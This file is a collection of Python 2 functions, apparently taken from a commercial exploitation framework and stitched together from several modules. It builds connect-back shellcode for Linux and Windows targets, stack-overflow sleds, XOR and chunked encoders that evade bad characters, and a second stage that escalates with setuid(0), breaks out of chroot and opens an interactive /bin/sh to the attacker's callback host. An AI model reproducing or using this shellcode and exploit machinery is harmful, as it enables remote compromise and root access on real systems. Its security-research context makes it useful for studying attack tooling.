def createShellcode(self):
"""
This exploit requires shellcode that is four byte aligned
"""
#import traceback
#traceback.print_stack(f=sys.stderr)
host = self.callback.ip
port = self.callback.port
if self.version in [1, 2]:
#the linux x86 versions create two shellcodes
myshellcode = shellcodeGenerator.linux_X86()
myshellcode.addAttr("mmap_callback", {
"host": host,
"port": port,
"do_setuid": False,
"do_exit": False
})
self.shellcode = myshellcode.get()
#add DEBUG if necessary
#self.shellcode="\xcc"+self.shellcode #add int 3 for testing
#now we four byte align it
self.log("Shellcode is of length: %d" % len(self.shellcode))
self.shellcode = self.shellcode + "A" * (4 -
len(self.shellcode) % 4)
self.log("Shellcode: %s" % hexprint(self.shellcode))
return self.shellcode
return None
def createShellcode(self):
"default linux/windows callback"
try:
if targets[self.version][0].lower().find("linux") > -1:
sc = shellcodeGenerator.linux_X86()
sc.addAttr("connect", {"ipaddress":self.callback.ip, "port":self.callback.port})
sc.addAttr("read_and_exec", {"fdreg": "esi"})
self.shellcode = sc.get()
elif targets[self.version][0].lower().find("windows") > -1:
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0x1000 })
#sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port":self.callback.port, "ipaddress":self.callback.ip})
sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread", None)
self.shellcode = sc.get()
except:
print "[!] did you forget to set -l -d on the commandline !?"
self.shellcode = "\xcc" * 256
print "[!] shellcode length is %d bytes"% len(self.shellcode)
return self.shellcode
def handleLinuxGOCode(s):
"""
Linux Go Code handler
"""
myshellcode=shellcodeGenerator.linux_X86()
myshellcode.addAttr("setblocking",None)
myshellcode.addAttr("read_and_exec",{"fdreg": "ebx"})
sc=myshellcode.get()
try:
self.log("Looking for GO handshake with second stage of length %d"%len(sc))
ret=linuxshell.doGOhandshake(s,secondstage=sc)
if not ret:
ret=linuxshell.doGOhandshake(s,secondstage=sc)
except:
traceback.print_exc(file=sys.stdout)
print "Setting ret to zero"
ret=0
if not ret:
self.log("Could not make a shell listener - connection was closed. Exploit most likely failed.")
self.setInfo("%s attacking %s:%d (could not make shell listener)"%(NAME,self.host,self.port))
return None
try:
node=linuxNode()
node.parentnode=self.socknode
linuxMosdefShellServer.linuxshellserver(s,node,logfunction=self.logfunction)
self.setInfo("%s attacking %s:%d (Succeeded!)"%(NAME,self.host,self.port))
node.startup()
return node
except:
traceback.print_exc(file=sys.stdout)
self.log("Could not make a shell listener - connection was closed. Exploit most likely failed.")
self.setInfo("%s attacking %s:%d (could not make shell listener)"%(NAME,self.host,self.port))
return None
def createShellcode(self):
localhost = self.callback.ip
localport = self.callback.port
# special case, using chunksize coder
self.remoteport=localport
from shellcode import shellcodeGenerator
myshellcode=shellcodeGenerator.linux_X86()
myshellcode.addAttr("connect",{"ipaddress" : localhost, "port": localport})
myshellcode.addAttr("read_and_exec",{"fdreg": "esi"})
myshellcode.get()
code=myshellcode.getcode()
self.shellcode = chunkize.chunkize(code , 20,16)
return 1 # + "exit:\n"
def buildCodeThingies(self):
lc = self.lc
lc_off = self.lc_off
call_esp = self.call_esp
distance_to_ret = self.distance_to_ret
varz5 = 'AAAA' + lc + 'BBBB' + 'CCCC'
varz4 = lc + 'DDDD' + 'EEEE' + 'FFFF'
varz3 = lc + lc + 'GGGG' + self.dodgy
varz2 = 'IIII' + 'JJJJ' + 'KKKK' + 'LLLL'
varz1 = 'MMMM' + 'NNNN' + lc_off + 'OOOO'
varz0 = '{{{{' + 'PPPP' + 'QQQQ'
self.varsled = varz5 + varz4 + varz3 + varz2 + varz1 + varz0 + 'RRRR' + call_esp
self.varsled += mosdef.assemble('jmp $-%d' % (100 + distance_to_ret),
'x86')
stackfix = """
subl $0xABCD,%esp
movl %esp,%ebp
"""
self.shellcode = mosdef.assemble(stackfix, "X86")
self.sc = shellcodeGenerator.linux_X86()
self.sc.addAttr(
'mmap_callback', {
'host': self.callback.ip,
'port': self.callback.port,
'do_setuid': False,
'do_exit': False
})
self.sc = self.sc.get()
self.log("checking for encoder")
if '\r' in self.sc or '\n' in self.sc:
self.log("Needs to be encoded..")
encoder = xorencoder.simpleXOR()
encoder.setbadstring("\x0a")
ret = encoder.find_key(self.sc)
if ret == 0:
self.log("could not make shellcode, xor failure")
raise Exception, "No shellcode possible with xor. customize it?"
self.sc = encoder.encode(self.sc)
if self.sc == "":
raise Exception, "no shellcode generated?"
else:
self.log("no encoder needed")
self.shellcode += self.sc
return self.shellcode
def createShellcode_lnx86(self, localhost, localport):
myshellcode = shellcodeGenerator.linux_X86()
myshellcode.addAttr("connect", {
"ipaddress": localhost,
"port": localport
})
myshellcode.addAttr("read_and_exec", {"fdreg": "esi"})
shellcode = myshellcode.get()
badstring = "\x00\\/.:?\r\n%?\" []&\t=;+-'"
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(badstring)
self.log("Encoding shellcode")
shellcode = encoder.encode(shellcode)
if shellcode == "":
self.log("Problem encoding shellcode")
raise Exception, "error encoding shellcode"
self.log("Shellcode length: %d" % len(shellcode))
return shellcode
def createShellcode(self):
sc = shellcodeGenerator.linux_X86()
sc.addAttr("setblocking", None)
sc.addAttr("read_and_exec", {"fdreg": "ebx"})
self.stage2 = sc.get()
return self.createLinuxGOShellcode(self.badstring)
def startup(self):
"""
this function is called by the engine and by self.run()
we are ready to rock!
Our stage one shellcode just reads in a word, then reads in that much data
and executes it
First we send some shellcode to get the socket registered
Then we send some shellcode to execve
"""
if self.started:
return
from libs.ctelnetlib import Telnet
self.log("Startup...")
try:
#for timeoutsocket
self.connection.set_timeout(None)
except:
self.log("Not using timeoutsocket on this node")
sc = shellcodeGenerator.linux_X86()
sc.addAttr("sendreg", {"fdreg": "ebx", "regtosend": "ebx"})
sc.addAttr("read_and_exec", {"fdreg": "ebx"})
getfd = sc.get()
self.sendrequest(getfd)
#now read in our little endian word that is our fd (originally in ebx)
self.fd = self.readword()
self.log("Self.fd=%d" % self.fd)
sc = shellcodeGenerator.linux_X86()
if self.initstring.count("whileone"):
sc.addAttr("whileone", None)
sc.addAttr("Normalize Stack", [500])
sc.addAttr("setuid", [0])
sc.addAttr("setreuid", [0, 0])
sc.addAttr("setuid", [0])
if self.initstring.count("chrootbreak"):
self.log("Doing a chrootbreak")
sc.addAttr("chrootbreak", None)
sc.addAttr("dup2", [self.fd])
sc.addAttr("setuid", None)
#myshellcode.addAttr("debugme",None)
sc.addAttr("execve", {
"argv": ["/bin/sh", "-i"],
"envp": [],
"filename": "/bin/sh"
})
self.log("Sent execve...")
mainloop = sc.get()
#print sc.getcode()
self.sendrequest(mainloop)
#now it should be running /bin/sh -i
telnetshell = Telnet()
telnetshell.sock = self.connection
print "Setting up shell listener."
shelllistener.__init__(self, telnetshell, logfunction=self.logfunction)
print "Set up shell listener"
#ok, now our mainloop code is running over on the other side
self.log("Set up Linux shell server")
#self.sendrequest(mainloop)
self.started = 1
return 1
def usage():
print """
Widechar (Word) Add Encoder 1.0, Immunity, Inc.
usage: widchar.py -f shellcode
"""
sys.exit(2)
#this stuff happens.
if __name__ == '__main__':
print "Running Add Encoder v 1.0"
print "Copyright Dave Aitel"
from shellcode import shellcodeGenerator
myshellcode = shellcodeGenerator.linux_X86()
#myshellcode.addAttr("Normalize Stack",[0])
#myshellcode.addAttr("dup2",None)
myshellcode.addAttr("setuid", None)
#myshellcode.addAttr("debugme",None)
myshellcode.addAttr("execve", {
"argv": ["/bin/sh", "-i"],
"envp": [],
"filename": "/bin/sh"
})
sc = myshellcode.get()
app = widechar_chunkedaddencoder()
app.setbadstring(wcsupr_bad)
print "Badchars: %s" % app.find_bad_char(binstring("1b554141"))
#data=app.encode(sc)